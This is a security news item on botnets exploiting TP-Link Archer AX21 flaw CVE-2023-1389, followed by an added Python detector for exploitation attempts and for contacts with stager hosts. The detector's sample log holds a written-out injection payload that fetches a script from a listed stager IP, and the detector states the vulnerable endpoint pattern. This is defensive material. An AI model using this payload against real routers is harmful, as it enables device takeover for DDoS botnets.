17 April 2024

Multiple botnets are hunting for vulnerable TP-Link routers



Multiple malware variants are targeting a security vulnerability in TP-Link Archer routers to ensnare them in DDoS botnets.

Tracked as CVE-2023-1389, the flaw is an unauthenticated command injection vulnerability in the locale API of the web management interface of the TP-Link Archer AX21 router. An attacker who can reach the web interface can execute arbitrary commands on the device by submitting specially crafted data to that API, with no credentials required. TP-Link addressed the vulnerability in a firmware update released in March 2023, so the routers still being compromised are those that have not been updated.

Cybersecurity researchers at Fortinet’s FortiGuard Labs have observed a surge in attacks targeting this vulnerability.

According to FortiGuard Labs, multiple botnets, including Moobot, Miori, the Golang-based agent "AGoent" and a Gafgyt (also known as Bashlite) variant, have been actively exploiting the vulnerability to compromise TP-Link Archer AX21 routers. Successful exploitation gives the attackers control of the device, which is then used to launch distributed denial-of-service (DDoS) attacks.

AGoent, a Golang-based bot, has been observed fetching a script named "exec.sh" from "hxxp://5[.]10[.]249[.]153", which in turn downloads ELF binaries built for several Linux architectures. The script attempts to execute each file in turn until one matches the device's architecture, then deletes the downloaded files to remove traces of the intrusion.

Similarly, the Gafgyt variant infects Linux-based operating systems to launch DDoS attacks. This variant downloads the script file “bins.sh” from “hxxp://195[.]62[.]32[.]227” and executes it to initiate the attack.

Moobot, on the other hand, retrieves a script file named “1.sh” from “hxxp://91[.]92[.]253[.]70,” with its primary objective being to fetch ELF files with different architectures for further infection. Once executed, Moobot removes itself and all traces from the compromised device.

Furthermore, attackers have been observed using Mirai variants to exploit the vulnerability. The attack sequence typically involves downloading "tenda.sh" from "hxxp://94[.]156[.]8[.]244", which then fetches ELF executables for various architectures from the same IP address. Miori, a Mirai variant, uses similar attack modules: it runs batch scripts fetched from "hxxp://185[.]224[.]128[.]34" and retrieves its ELF files over both HTTP and TFTP.
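The description of the flaw above and the stager hosts and script names listed for the five botnets give a defender two things to look for: exploitation attempts against the router's web interface, and the follow-on download of the dropper script. The Python below is an added example, not code from the page, from FortiGuard Labs or from TP-Link. The locale endpoint path and the `form=country`, `operation=write` and `country` parameter names are not stated on the page; they are taken from the public advisory for CVE-2023-1389 (ZDI-23-451) and are marked as such in the code. The access-log and firewall-log lines are constructed samples in a generic combined-log and key=value format; adjust the two regexes to whatever your router, reverse proxy or firewall actually emits.

```python
import re
from urllib.parse import unquote_plus

# Stager hosts and script names from the FortiGuard report summarised above. The page defangs the IPs
# with brackets; they are plain here so the strings match what a proxy or firewall log would contain.
STAGER_IPS = {
    "5.10.249.153": "AGoent",
    "195.62.32.227": "Gafgyt/Bashlite",
    "91.92.253.70": "Moobot",
    "94.156.8.244": "Mirai",
    "185.224.128.34": "Miori",
}
STAGER_SCRIPTS = {"exec.sh", "bins.sh", "1.sh", "tenda.sh"}

# ASSUMPTION (not on the page): per the public advisory for CVE-2023-1389 (ZDI-23-451) the injection
# is in the 'country' parameter of the locale form (/cgi-bin/luci/;stok=/locale?form=country)
# when operation=write. A legitimate country value is a short alphanumeric code, so any shell
# metacharacter in it is treated as an injection attempt.
LOCALE_PATH_RE = re.compile(r"/cgi-bin/luci/;stok=[^/?]*/locale$")
SHELL_META_RE = re.compile(r"[;|&`$(){}\n]")

# Combined-log-format access line (constructed format; adapt to your device's log).
ACCESS_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)


def _form_params(*encoded):
    """Decode one or more application/x-www-form-urlencoded strings into a dict (first value wins).
    Splits on '&' only, so a ';' inside an injected value is kept as part of that value."""
    params = {}
    for raw in encoded:
        for pair in raw.split("&"):
            key, _, value = pair.partition("=")
            if key:
                params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def classify_request(method, url, body=""):
    """Return a verdict string if the request looks like a CVE-2023-1389 attempt, else None."""
    path, _, query = url.partition("?")
    if not LOCALE_PATH_RE.search(path):
        return None
    # GET carries the form in the query string; POST carries it in the body (when the log has it).
    params = _form_params(query, body)
    if (params.get("form") == "country" and params.get("operation") == "write"
            and SHELL_META_RE.search(params.get("country", ""))):
        return "CVE-2023-1389 command injection attempt"
    return None


def stager_iocs(text):
    """Return the stager IPs and script names from the report that occur in a (decoded) log line."""
    found = {ip for ip in STAGER_IPS if ip in text}
    found |= {name for name in STAGER_SCRIPTS if re.search(r"/" + re.escape(name) + r"(\W|$)", text)}
    return found


def scan_access_log(lines):
    """Return (source IP, verdict, sorted IOCs) for every exploitation attempt in the access log."""
    hits = []
    for line in lines:
        m = ACCESS_LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m["method"], m["url"])
        if verdict:
            hits.append((m["src"], verdict, sorted(stager_iocs(unquote_plus(m["url"])))))
    return hits


def scan_outbound(lines):
    """Map each internal source to the botnet families whose stager hosts it contacted."""
    contacts = {}
    for line in lines:
        m = re.search(r"src=(?P<src>\S+) dst=(?P<dst>\S+)", line)
        if m and m["dst"] in STAGER_IPS:
            contacts.setdefault(m["src"], set()).add(STAGER_IPS[m["dst"]])
    return contacts


# Constructed sample data, not real captures.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [17/Apr/2024:10:01:02 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id) HTTP/1.1" 200 12',
    '198.51.100.9 - - [17/Apr/2024:10:01:40 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24(wget+http%3A%2F%2F5.10.249.153%2Fexec.sh) HTTP/1.1" 200 12',
    '192.168.0.20 - - [17/Apr/2024:10:02:10 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 200 88',
    '192.168.0.20 - - [17/Apr/2024:10:02:11 +0000] "GET /cgi-bin/luci/;stok=abc123/admin/status?form=all HTTP/1.1" 200 512',
]
SAMPLE_FIREWALL_LOG = [
    "2024-04-17T10:01:05Z action=allow src=192.168.0.1 dst=5.10.249.153 dport=80 proto=tcp",
    "2024-04-17T10:01:44Z action=allow src=192.168.0.1 dst=91.92.253.70 dport=80 proto=tcp",
    "2024-04-17T10:03:00Z action=allow src=192.168.0.20 dst=93.184.216.34 dport=443 proto=tcp",
]

if __name__ == "__main__":
    for src, verdict, iocs in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{src}: {verdict} iocs={iocs}")
    for src, families in scan_outbound(SAMPLE_FIREWALL_LOG).items():
        print(f"{src} fetched stagers from: {', '.join(sorted(families))}")
```

The two scans are deliberately independent: an exploitation attempt in the access log tells you the device is exposed and being probed, while an outbound connection from the router itself to one of the listed stager hosts tells you the injection succeeded and the dropper script was fetched. The second signal is the one to alert on, and it is also the one that survives if the attacker changes the exploit encoding, which is why the IOC list is kept separate from the request classifier.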

In April 2023, researchers at Trend Micro reported that a Mirai variant was exploiting the same flaw to commandeer vulnerable TP-Link routers and launch attacks on game servers.
